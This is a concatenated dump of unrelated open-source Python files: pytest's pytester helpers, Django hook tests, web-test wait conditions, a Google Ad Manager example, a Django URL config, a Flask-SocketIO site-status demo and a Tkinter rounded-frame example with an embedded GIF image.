self._savemodulekeys = set(sys.modules)
self.chdir() # always chdir
self.request.addfinalizer(self.finalize)
method = self.request.config.getoption("--runpytest")
if method == "inprocess":
self._runpytest_method = self.runpytest_inprocess
elif method == "subprocess":
self._runpytest_method = self.runpytest_subprocess
def __repr__(self):
return "<Testdir %r>" % (self.tmpdir,)
def finalize(self):
"""Clean up global state artifacts.
Some methods modify the global interpreter state and this
tries to clean this up. It does not remove the temporary
directory however so it can be looked at after the test run
has finished.
"""
sys.path[:], sys.meta_path[:] = self._savesyspath
if hasattr(self, '_olddir'):
self._olddir.chdir()
self.delete_loaded_modules()
def delete_loaded_modules(self):
"""Delete modules that have been loaded during a test.
This allows the interpreter to catch module changes in case
the module is re-imported.
"""
for name in set(sys.modules).difference(self._savemodulekeys):
# it seems zope.interfaces is keeping some state
# (used by twisted related tests)
if name != "zope.interface":
del sys.modules[name]
def make_hook_recorder(self, pluginmanager):
"""Create a new :py:class:`HookRecorder` for a PluginManager."""
assert not hasattr(pluginmanager, "reprec")
pluginmanager.reprec = reprec = HookRecorder(pluginmanager)
self.request.addfinalizer(reprec.finish_recording)
return reprec
def chdir(self):
"""Cd into the temporary directory.
This is done automatically upon instantiation.
"""
old = self.tmpdir.chdir()
if not hasattr(self, '_olddir'):
self._olddir = old
def _makefile(self, ext, args, kwargs):
items = list(kwargs.items())
if args:
source = py.builtin._totext("\n").join(
map(py.builtin._totext, args)) + py.builtin._totext("\n")
basename = self.request.function.__name__
items.insert(0, (basename, source))
ret = None
for name, value in items:
p = self.tmpdir.join(name).new(ext=ext)
source = py.code.Source(value)
def my_totext(s, encoding="utf-8"):
if py.builtin._isbytes(s):
s = py.builtin._totext(s, encoding=encoding)
return s
source_unicode = "\n".join([my_totext(line) for line in source.lines])
source = py.builtin._totext(source_unicode)
content = source.strip().encode("utf-8") # + "\n"
#content = content.rstrip() + "\n"
p.write(content, "wb")
if ret is None:
ret = p
return ret
def makefile(self, ext, *args, **kwargs):
"""Create a new file in the testdir.
ext: The extension the file should use, including the dot.
E.g. ".py".
args: All args will be treated as strings and joined using
newlines. The result will be written as contents to the
file. The name of the file will be based on the test
function requesting this fixture.
E.g. "testdir.makefile('.txt', 'line1', 'line2')"
kwargs: Each keyword is the name of a file, while the value of
it will be written as contents of the file.
E.g. "testdir.makefile('.ini', pytest='[pytest]\naddopts=-rs\n')"
"""
return self._makefile(ext, args, kwargs)
def makeconftest(self, source):
"""Write a contest.py file with 'source' as contents."""
return self.makepyfile(conftest=source)
def makeini(self, source):
"""Write a tox.ini file with 'source' as contents."""
return self.makefile('.ini', tox=source)
def getinicfg(self, source):
"""Return the pytest section from the tox.ini config file."""
p = self.makeini(source)
return py.iniconfig.IniConfig(p)['pytest']
def makepyfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .py extension."""
return self._makefile('.py', args, kwargs)
def maketxtfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .txt extension."""
return self._makefile('.txt', args, kwargs)
def syspathinsert(self, path=None):
"""Prepend a directory to sys.path, defaults to :py:attr:`tmpdir`.
This is undone automatically after the test.
"""
if path is None:
path = self.tmpdir
sys.path.insert(0, str(path))
def mkdir(self, name):
"""Create a new (sub)directory."""
return self.tmpdir.mkdir(name)
def mkpydir(self, name):
"""Create a new python package.
This creates a (sub)direcotry with an empty ``__init__.py``
file so that is recognised as a python package.
"""
p = self.mkdir(name)
p.ensure("__init__.py")
return p
Session = Session
def getnode(self, config, arg):
"""Return the collection node of a file.
:param config: :py:class:`_pytest.config.Config` instance, see
:py:meth:`parseconfig` and :py:meth:`parseconfigure` to
create the configuration.
:param arg: A :py:class:`py.path.local` instance of the file.
"""
session = Session(config)
assert '::' not in str(arg)
p = py.path.local(arg)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([str(p)], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def getpathnode(self, path):
"""Return the collection node of a file.
This is like :py:meth:`getnode` but uses
:py:meth:`parseconfigure` to create the (configured) py.test
Config instance.
:param path: A :py:class:`py.path.local` instance of the file.
"""
config = self.parseconfigure(path)
session = Session(config)
x = session.fspath.bestrelpath(path)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([x], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def genitems(self, colitems):
"""Generate all test items from a collection node.
This recurses into the collection node and returns a list of
all the test items contained within.
"""
session = colitems[0].session
result = []
for colitem in colitems:
result.extend(session.genitems(colitem))
return result
def runitem(self, source):
"""Run the "test_func" Item.
The calling test instance (the class which contains the test
method) must provide a ``.getrunner()`` method which should
return a runner which can run the test protocol for a single
item, like e.g. :py:func:`_pytest.runner.runtestprotocol`.
"""
# used from runner functional tests
item = self.getitem(source)
# the test class where we are called from wants to provide the runner
testclassinstance = self.request.instance
runner = testclassinstance.getrunner()
return runner(item)
def inline_runsource(self, source, *cmdlineargs):
"""Run a test module in process using ``pytest.main()``.
This run writes "source" into a temporary file and runs
``pytest.main()`` on it, returning a :py:class:`HookRecorder`
instance for the result.
:param source: The source code of the test module.
:param cmdlineargs: Any extra command line arguments to use.
:return: :py:class:`HookRecorder` instance of the result.
"""
p = self.makepyfile(source)
l = list(cmdlineargs) + [p]
return self.inline_run(*l)
def inline_genitems(self, *args):
"""Run ``pytest.main(['--collectonly'])`` in-process.
Retuns a tuple of the collected items and a
:py:class:`HookRecorder` instance.
This runs the :py:func:`pytest.main` function to run all of
py.test inside the test process itself like
:py:meth:`inline_run`. However the return value is a tuple of
the collection items and a :py:class:`HookRecorder` instance.
"""
rec = self.inline_run("--collect-only", *args)
items = [x.item for x in rec.getcalls("pytest_itemcollected")]
return items, rec
def inline_run(self, *args, **kwargs):
"""Run ``pytest.main()`` in-process, returning a HookRecorder.
This runs the :py:func:`pytest.main` function to run all of
py.test inside the test process itself. This means it can
return a :py:class:`HookRecorder` instance which gives more
detailed results from then run then can be done by matching
stdout/stderr from :py:meth:`runpytest`.
:param args: Any command line arguments to pass to
:py:func:`pytest.main`.
:param plugin: (keyword-only) Extra plugin instances the
``pytest.main()`` instance should use.
:return: A :py:class:`HookRecorder` instance.
"""
rec = []
class Collect:
def pytest_configure(x, config):
rec.append(self.make_hook_recorder(config.pluginmanager))
plugins = kwargs.get("plugins") or []
plugins.append(Collect())
ret = pytest.main(list(args), plugins=plugins)
self.delete_loaded_modules()
if len(rec) == 1:
reprec = rec.pop()
else:
class reprec:
pass
reprec.ret = ret
# typically we reraise keyboard interrupts from the child run
# because it's our user requesting interruption of the testing
if ret == 2 and not kwargs.get("no_reraise_ctrlc"):
calls = reprec.getcalls("pytest_keyboard_interrupt")
if calls and calls[-1].excinfo.type == KeyboardInterrupt:
raise KeyboardInterrupt()
return reprec
def runpytest_inprocess(self, *args, **kwargs):
""" Return result of running pytest in-process, providing a similar
interface to what self.runpytest() provides. """
if kwargs.get("syspathinsert"):
self.syspathinsert()
now = time.time()
capture = py.io.StdCapture()
try:
try:
reprec = self.inline_run(*args, **kwargs)
except SystemExit as e:
class reprec:
ret = e.args[0]
except Exception:
traceback.print_exc()
class reprec:
ret = 3
finally:
out, err = capture.reset()
sys.stdout.write(out)
sys.stderr.write(err)
res = RunResult(reprec.ret,
out.split("\n"), err.split("\n"),
time.time()-now)
res.reprec = reprec
return res
def runpytest(self, *args, **kwargs):
""" Run pytest inline or in a subprocess, depending on the command line
option "--runpytest" and return a :py:class:`RunResult`.
"""
args = self._ensure_basetemp(args)
return self._runpytest_method(*args, **kwargs)
def _ensure_basetemp(self, args):
args = [str(x) for x in args]
for x in args:
if str(x).startswith('--basetemp'):
#print ("basedtemp exists: %s" %(args,))
break
else:
args.append("--basetemp=%s" % self.tmpdir.dirpath('basetemp'))
#print ("added basetemp: %s" %(args,))
return args
def parseconfig(self, *args):
"""Return a new py.test Config instance from given commandline args.
This invokes the py.test bootstrapping code in _pytest.config
to create a new :py:class:`_pytest.core.PluginManager` and
call the pytest_cmdline_parse hook to create new
:py:class:`_pytest.config.Config` instance.
If :py:attr:`plugins` has been populated they should be plugin
modules which will be registered with the PluginManager.
"""
args = self._ensure_basetemp(args)
import _pytest.config
config = _pytest.config._prepareconfig(args, self.plugins)
# we don't know what the test will do with this half-setup config
# object and thus we make sure it gets unconfigured properly in any
# case (otherwise capturing could still be active, for example)
self.request.addfinalizer(config._ensure_unconfigure)
return config
def parseconfigure(self, *args):
"""Return a new py.test configured Config instance.
This returns a new :py:class:`_pytest.config.Config` instance
like :py:meth:`parseconfig`, but also calls the
pytest_configure hook.
"""
config = self.parseconfig(*args)
config._do_configure()
self.request.addfinalizer(config._ensure_unconfigure)
return config
def getitem(self, source, funcname="test_func"):
"""Return the test item for a test function.
This writes the source to a python file and runs py.test's
collection on the resulting module, returning the test item
for the requested function name.
:param source: The module source.
:param funcname: The name of the test function for which the
Item must be returned.
"""
items = self.getitems(source)
for item in items:
if item.name == funcname:
return item
assert 0, "%r item not found in module:\n%s\nitems: %s" %(
funcname, source, items)
def getitems(self, source):
"""Return all test items collected from the module.
This writes the source to a python file and runs py.test's
collection on the resulting module, returning all test items
contained within.
"""
modcol = self.getmodulecol(source)
return self.genitems([modcol])
def getmodulecol(self, source, configargs=(), withinit=False):
"""Return the module collection node for ``source``.
This writes ``source`` to a file using :py:meth:`makepyfile`
and then runs the py.test collection on it, returning the
collection node for the test module.
:param source: The source code of the module to collect.
:param configargs: Any extra arguments to pass to
:py:meth:`parseconfigure`.
:param withinit: Whether to also write a ``__init__.py`` file
to the temporarly directory to ensure it is a package.
"""
kw = {self.request.function.__name__: py.code.Source(source).strip()}
path = self.makepyfile(**kw)
if withinit:
self.makepyfile(__init__ = "#")
self.config = config = self.parseconfigure(path, *configargs)
node = self.getnode(config, path)
return node
def collect_by_name(self, modcol, name):
"""Return the collection node for name from the module collection.
This will search a module collection node for a collection
node matching the given name.
:param modcol: A module collection node, see
:py:meth:`getmodulecol`.
:param name: The name of the node to return.
"""
for colitem in modcol._memocollect():
if colitem.name == name:
return colitem
def popen(self, cmdargs, stdout, stderr, **kw):
"""Invoke subprocess.Popen.
This calls subprocess.Popen making sure the current working
directory is the PYTHONPATH.
You probably want to use :py:meth:`run` instead.
"""
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(filter(None, [
str(os.getcwd()), env.get('PYTHONPATH', '')]))
kw['env'] = env
return subprocess.Popen(cmdargs,
stdout=stdout, stderr=stderr, **kw)
def run(self, *cmdargs):
"""Run a command with arguments.
Run a process using subprocess.Popen saving the stdout and
stderr.
Returns a :py:class:`RunResult`.
"""
return self._run(*cmdargs)
def _run(self, *cmdargs):
cmdargs = [str(x) for x in cmdargs]
p1 = self.tmpdir.join("stdout")
p2 = self.tmpdir.join("stderr")
print_("running:", ' '.join(cmdargs))
print_(" in:", str(py.path.local()))
f1 = codecs.open(str(p1), "w", encoding="utf8")
f2 = codecs.open(str(p2), "w", encoding="utf8")
try:
now = time.time()
popen = self.popen(cmdargs, stdout=f1, stderr=f2,
close_fds=(sys.platform != "win32"))
ret = popen.wait()
finally:
f1.close()
f2.close()
f1 = codecs.open(str(p1), "r", encoding="utf8")
f2 = codecs.open(str(p2), "r", encoding="utf8")
try:
out = f1.read().splitlines()
err = f2.read().splitlines()
finally:
f1.close()
f2.close()
self._dump_lines(out, sys.stdout)
self._dump_lines(err, sys.stderr)
return RunResult(ret, out, err, time.time()-now)
def _dump_lines(self, lines, fp):
try:
for line in lines:
py.builtin.print_(line, file=fp)
except UnicodeEncodeError:
print("couldn't print to %s because of encoding" % (fp,))
def _getpytestargs(self):
# we cannot use "(sys.executable,script)"
# because on windows the script is e.g. a py.test.exe
return (sys.executable, _pytest_fullpath,) # noqa
def runpython(self, script):
"""Run a python script using sys.executable as interpreter.
Returns a :py:class:`RunResult`.
"""
return self.run(sys.executable, script)
def runpython_c(self, command):
"""Run python -c "command", return a :py:class:`RunResult`."""
return self.run(sys.executable, "-c", command)
def runpytest_subprocess(self, *args, **kwargs):
"""Run py.test as a subprocess with given arguments.
Any plugins added to the :py:attr:`plugins` list will added
using the ``-p`` command line option. Addtionally
``--basetemp`` is used put any temporary files and directories
in a numbered directory prefixed with "runpytest-" so they do
not conflict with the normal numberd pytest location for
temporary files and directories.
Returns a :py:class:`RunResult`.
"""
p = py.path.local.make_numbered_dir(prefix="runpytest-",
keep=None, rootdir=self.tmpdir)
args = ('--basetemp=%s' % p, ) + args
#for x in args:
# if '--confcutdir' in str(x):
# break
#else:
# pass
# args = ('--confcutdir=.',) + args
plugins = [x for x in self.plugins if isinstance(x, str)]
if plugins:
args = ('-p', plugins[0]) + args
args = self._getpytestargs() + args
return self.run(*args)
def spawn_pytest(self, string, expect_timeout=10.0):
"""Run py.test using pexpect.
This makes sure to use the right py.test and sets up the
temporary directory locations.
The pexpect child is returned.
"""
basetemp = self.tmpdir.mkdir("pexpect")
invoke = " ".join(map(str, self._getpytestargs()))
cmd = "%s --basetemp=%s %s" % (invoke, basetemp, string)
return self.spawn(cmd, expect_timeout=expect_timeout)
def spawn(self, cmd, expect_timeout=10.0):
"""Run a command using pexpect.
The pexpect child is returned.
"""
pexpect = pytest.importorskip("pexpect", "3.0")
if hasattr(sys, 'pypy_version_info') and '64' in platform.machine():
pytest.skip("pypy-64 bit not supported")
if sys.platform == "darwin":
pytest.xfail("pexpect does not work reliably on darwin?!")
if sys.platform.startswith("freebsd"):
pytest.xfail("pexpect does not work reliably on freebsd")
logfile = self.tmpdir.join("spawn.out").open("wb")
child = pexpect.spawn(cmd, logfile=logfile)
self.request.addfinalizer(logfile.close)
child.timeout = expect_timeout
return child
def getdecoded(out):
try:
return out.decode("utf-8")
except UnicodeDecodeError:
return "INTERNAL not-utf8-decodeable, truncated string:\n%s" % (
py.io.saferepr(out),)
class LineComp:
def __init__(self):
self.stringio = py.io.TextIO()
def assert_contains_lines(self, lines2):
""" assert that lines2 are contained (linearly) in lines1.
return a list of extralines found.
"""
__tracebackhide__ = True
val = self.stringio.getvalue()
self.stringio.truncate(0)
self.stringio.seek(0)
lines1 = val.split("\n")
return LineMatcher(lines1).fnmatch_lines(lines2)
class LineMatcher:
"""Flexible matching of text.
This is a convenience class to test large texts like the output of
commands.
The constructor takes a list of lines without their trailing
newlines, i.e. ``text.splitlines()``.
"""
def __init__(self, lines):
self.lines = lines
def str(self):
"""Return the entire original text."""
return "\n".join(self.lines)
def _getlines(self, lines2):
if isinstance(lines2, str):
lines2 = py.code.Source(lines2)
if isinstance(lines2, py.code.Source):
lines2 = lines2.strip().lines
return lines2
def fnmatch_lines_random(self, lines2):
"""Check lines exist in the output.
The argument is a list of lines which have to occur in the
output, in any order. Each line can contain glob whildcards.
"""
lines2 = self._getlines(lines2)
for line in lines2:
for x in self.lines:
if line == x or fnmatch(x, line):
print_("matched: ", repr(line))
break
else:
raise ValueError("line %r not found in output" % line)
def get_lines_after(self, fnline):
"""Return all lines following the given line in the text.
The given line can contain glob wildcards.
"""
for i, line in enumerate(self.lines):
if fnline == line or fnmatch(line, fnline):
return self.lines[i+1:]
raise ValueError("line %r not found in output" % fnline)
def fnmatch_lines(self, lines2):
"""Search the text for matching lines.
The argument is a list of lines which have to match and can
use glob wildcards. If they do not match an pytest.fail() is
called. The matches and non-matches are also printed on
stdout.
"""
def show(arg1, arg2):
py.builtin.print_(arg1, arg2, file=sys.stderr)
lines2 = self._getlines(lines2)
lines1 = self.lines[:]
nextline = None
extralines = []
__tracebackhide__ = True
for line in lines2:
nomatchprinted = False
while lines1:
nextline = lines1.pop(0)
if line == nextline:
show("exact match:", repr(line))
break
elif fnmatch(nextline, line):
show("fnmatch:", repr(line))
show(" with:", repr(nextline))
break
else:
if not nomatchprinted:
show("nomatch:", repr(line))
nomatchprinted = True
show(" and:", repr(nextline))
extralines.append(nextline)
else:
pytest.fail("remains unmatched: %r, see stderr" % (line,))
| Akasurde/pytest | _pytest/pytester.py | Python | mit | 38,056 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
from unittest import mock
except ImportError:
import mock
from django.test import TestCase
from hooks.viewhook import HookBase, HookProxy, Hook
class HookBaseTest(TestCase):
def setUp(self):
pass
def test_instance(self):
hook = HookBase("request", "foo", extra="bar")
self.assertEqual(hook.request, "request")
self.assertEqual(hook.args, ("foo", ))
self.assertDictEqual(hook.kwargs, {'extra': "bar", })
self.assertDictEqual(hook.context, {})
def test_methods(self):
hook = HookBase("request")
self.assertIsNone(hook.dispatch("foo", extra="bar"))
self.assertIsNone(hook.get("foo", extra="bar"))
self.assertIsNone(hook.post("foo", extra="bar"))
self.assertTrue(hook.is_valid())
self.assertIsNone(hook.save("foo", extra="bar"))
def test_proxy_method(func_name):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
func = getattr(proxy, func_name)
func("foo", extra="bar")
mocked = getattr(hook_a, func_name)
mocked.assert_called_once_with("foo", extra="bar")
mocked = getattr(hook_b, func_name)
mocked.assert_called_once_with("foo", extra="bar")
class HookProxyTest(TestCase):
def setUp(self):
pass
def test_instance(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
proxy = HookProxy([hook_a, hook_b], "request", "foo", extra="bar")
hook_a.assert_called_once_with("request", "foo", extra="bar")
hook_b.assert_called_once_with("request", "foo", extra="bar")
def test_methods(self):
test_proxy_method("dispatch")
test_proxy_method("get")
test_proxy_method("post")
test_proxy_method("save")
self.assertRaises(AttributeError, test_proxy_method, "foo")
def test_is_valid(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
hook_a.is_valid.return_value = True
hook_b.is_valid.return_value = True
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
self.assertTrue(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = False
hook_b.is_valid.return_value = True
hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = True
hook_b.is_valid.return_value = False
hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = False
hook_b.is_valid.return_value = False
hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
# if there are no hooks registered, should be valid
proxy2 = HookProxy([])
self.assertTrue(proxy2.is_valid())
def test_context(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
hook_a.context = {"hook_a": "foo", }
hook_b.context = {"hook_b": "foo", }
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
self.assertDictEqual(proxy.context, {"hook_a": "foo", "hook_b": "foo"})
class HookTest(TestCase):
def setUp(self):
pass
def test_register(self):
class BadHook:
""""""
class GoodHook(HookBase):
""""""
hook = Hook()
self.assertRaises(AssertionError, hook.register, BadHook)
self.assertRaises(AssertionError, hook.register, GoodHook("req"))
hook.register(GoodHook)
self.assertListEqual(hook._registry, [GoodHook, ])
def test_unregister(self):
class GoodHook(HookBase):
""""""
hook = Hook()
hook.register(GoodHook)
self.assertListEqual(hook._registry, [GoodHook, ])
hook.unregister(GoodHook)
self.assertListEqual(hook._registry, [])
# calling unregister again should do nothing
hook.unregister(GoodHook)
self.assertListEqual(hook._registry, [])
def test_call(self):
hook = Hook()
with mock.patch.object(HookProxy, '__init__') as mock_init:
mock_init.return_value = None
proxy = hook("foo", extra="bar")
mock_init.assert_called_once_with(hook._registry, "foo", extra="bar")
self.assertIsInstance(proxy, HookProxy)
| nitely/django-hooks | hooks/tests/tests_viewhook.py | Python | mit | 4,892 |
import datetime
import time
import hlib.tests
import tests
class AbstractWait(object):
DEFAULT_TIMEOUT = 10
DEFAULT_DELAY = 0.5
def __init__(self, cond, timeout = None, delay = None):
super(AbstractWait, self).__init__()
self.cond = cond
self.timeout = timeout or AbstractWait.DEFAULT_TIMEOUT
self.delay = delay or AbstractWait.DEFAULT_DELAY
def condition_test(self):
raise hlib.error.UnimplementedError(obj = AbstractWait)
def wait(self, fail = True):
wait_until = datetime.datetime.now() + datetime.timedelta(seconds = self.timeout)
while True:
if self.condition_test():
return True
current_time = datetime.datetime.now()
if current_time >= wait_until:
break
time.sleep(self.delay)
if fail:
assert False, 'Waiting failed: condition="%s"' % str(self.cond)
return False
class Condition(object):
def __init__(self):
super(Condition, self).__init__()
#
# "Wait for ..." classes
#
class WaitUntil(AbstractWait):
def condition_test(self):
return self.cond()
class WaitWhile(AbstractWait):
def condition_test(self):
return not self.cond()
#
# Browser conditions
#
class BrowserCondition(Condition):
def __init__(self, browser):
super(BrowserCondition, self).__init__()
self.browser = browser
class BrowserHasURL(BrowserCondition):
def __init__(self, browser, url):
super(BrowserHasURL, self).__init__(browser)
self.url = url
def __str__(self):
return 'Browser in on page with URL %s' % self.url
def __call__(self):
return self.browser.url == self.url
class BrowserHasElement(BrowserCondition):
def __init__(self, browser, lookup, *args):
super(BrowserHasURL, self).__init__(browser)
self.lookup = lookup
self.args = args
def __str__(self):
return 'Browser has element %s(%s)' % (self.lookup, self.args)
def __call__(self):
return getattr(self.browser, self.lookup)(*self.args)
| happz/settlers | tests/web/conditions/__init__.py | Python | mit | 1,964 |
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates ad unit sizes by adding a banner ad size.
To determine which ad units exist, run get_all_ad_units.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the ad unit to get.
AD_UNIT_ID = 'INSERT_AD_UNIT_ID_HERE'
def main(client, ad_unit_id):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v202111')
# Create a statement to select a single ad unit by ID.
statement = (ad_manager.StatementBuilder(version='v202111')
.Where('id = :id')
.WithBindVariable('id', ad_unit_id))
# Get ad units by statement.
response = inventory_service.getAdUnitsByStatement(
statement.ToStatement())
# Add the size 468x60 to the ad unit.
ad_unit_size = {
'size': {
'width': '468',
'height': '60'
},
'environmentType': 'BROWSER'
}
if 'results' in response and len(response['results']):
updated_ad_units = []
for ad_unit in response['results']:
if 'adUnitSizes' not in ad_unit:
ad_unit['adUnitSizes'] = []
ad_unit['adUnitSizes'].append(ad_unit_size)
updated_ad_units.append(ad_unit)
# Update ad unit on the server.
ad_units = inventory_service.updateAdUnits(updated_ad_units)
# Display results.
for ad_unit in ad_units:
ad_unit_sizes = ['{%s x %s}' % (size['size']['width'],
size['size']['height'])
for size in ad_unit['adUnitSizes']]
print('Ad unit with ID "%s", name "%s", and sizes [%s] was updated'
% (ad_unit['id'], ad_unit['name'], ','.join(ad_unit_sizes)))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, AD_UNIT_ID)
| googleads/googleads-python-lib | examples/ad_manager/v202111/inventory_service/update_ad_units.py | Python | apache-2.0 | 2,750 |
from django.conf.urls import patterns, include, url
from .views import BandwidthHomeView
bandwidth_urls = patterns('',
url(
r'^$',
BandwidthHomeView.as_view(),
name='list'
),
# url(
# r'bandwidth/(?P<pk>[0-9]+)/$',
# BandwidthTestDetail.as_view(),
# name='retrieveupdatedestroy'
# ),
)
urlpatterns = patterns('',
url(r'^', include(bandwidth_urls, namespace='bandwidthtest')),
)
| hellsgate1001/graphs | bandwidthtest/urls.py | Python | mit | 450 |
#!/usr/bin/env python3
# imports go here
from gevent import monkey
monkey.patch_all()
import time
from threading import Thread
import urllib
from flask import Flask, render_template
from flask.ext.socketio import SocketIO
from flask_debugtoolbar import DebugToolbarExtension
#
# Free Coding session for 2015-02-12
# Written by Matt Warren
#
app = Flask(__name__)
app.config['SECRET_KEY'] = 'oaisndviouhwdnvilxuanbodni'
app.debug = True
socketio = SocketIO(app)
toolbar = DebugToolbarExtension(app)
thread = None
SITES = [
'http://halotis.com',
'http://mattwarren.co',
'http://columfurey.com',
'http://www.routeburn.co',
'http://persistenceapp.com'
]
def update_website_status():
site_status = {}
for site in SITES:
site_status[site] = urllib.urlopen(site).getcode()
return site_status
def background_thread():
"""Example of how to send server generated events to clients."""
while True:
status = update_website_status()
socketio.emit('my response',
{'data': 'Server generated event', 'statuses': status},
namespace='')
time.sleep(10)
@app.route('/')
def index():
global thread
if thread is None:
thread = Thread(target=background_thread)
thread.start()
return render_template('index.html')
@socketio.on('event')
def message(message):
pass # this seems to initialze the socket io
if __name__ == '__main__':
socketio.run(app)
| mfwarren/FreeCoding | 2015/02/fc_2015_02_12.py | Python | mit | 1,492 |
"""Ttk Frame with rounded corners.
Based on an example by Bryan Oakley, found at: http://wiki.tcl.tk/20152"""
import Tkinter
import ttk
root = Tkinter.Tk()
img1 = Tkinter.PhotoImage("frameFocusBorder", data="""
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
Ry/99NIz//oGrZpUUEAAOw==""")
